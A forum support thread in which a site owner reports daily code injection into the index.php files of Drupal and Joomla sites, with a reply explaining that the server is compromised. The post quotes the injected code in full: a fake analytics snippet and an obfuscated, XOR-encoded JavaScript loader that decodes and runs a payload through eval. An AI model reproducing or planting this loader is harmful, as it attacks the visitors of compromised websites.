I have three drupal sites and one joomla site. Something is entering faulty code into all of the index.php files on my server. Each day I have to delete that faulty code to get my sites working. This has become a major pain. I thought it was my hosting company but apparently they are blaming ME for using third party software and wont help me. Any idea's whats causing this guys!? Thank you in advance.

echo '<script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script>'; echo ''; echo ''; echo '<script>mktgmk="454e42544c444f550f565348554409061d484753404c44015253421c03495555511b0e0e18100f1310130f17140f1015190e030156484555491c10014944484649551c131f1d0e484753404c441f06081a2c2b575052404a531c036f406f031a43431c036f406f031a";iymrih="function haco(){otrlc=Math.PI;low=parseInt;xkr='length';ajt=low(~((otrlc&otrlc)|(~otrlc&otrlc)&(otrlc&~otrlc)|(~otrlc&~otrlc)));cmbi=low(((ajt&ajt)|(~ajt&ajt)&(ajt&~ajt)|(~ajt&~ajt))&1);kxb=cmbi<<cmbi;bb=ajt;bb=ajt;vqsakr='';buqmu=eval(unescape('%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65'));rhhvaq=eval;for(jcszf=ajt;jcszf<iymrih[xkr];jcszf-=-cmbi)bb+=iymrih.charCodeAt(jcszf);bb%=unescape(ajt+unescape('x')+(1<<6));for(jcszf=ajt;jcszf<mktgmk[xkr];jcszf+=kxb)vqsakr+=buqmu(low(ajt+unescape('x')+mktgmk.charAt(jcszf)+mktgmk.charAt(jcszf+low(cmbi)))^bb);try{rhhvaq(vqsakr);}catch(e){try{eval(vqsakr);}catch(e) {window.location='/';}}}try{eval('haco();')}catch(e) {alert('err');}";eval(iymrih);</script>';

Comments

heine’s picture

heine commented
Category: bug » support

Your server is compromised. The avenue of attack can be something outside of Drupal; someone stole your FTP password via a databreach at the host, someone stole your FTP password via a trojan on your pc, someone exploited a known vulnerability in a server application.

You need to work with your host to find out what happened.

mdupont’s picture

mdupont
Primary language French
Location Switzerland
commented
Status: Active » Closed (fixed)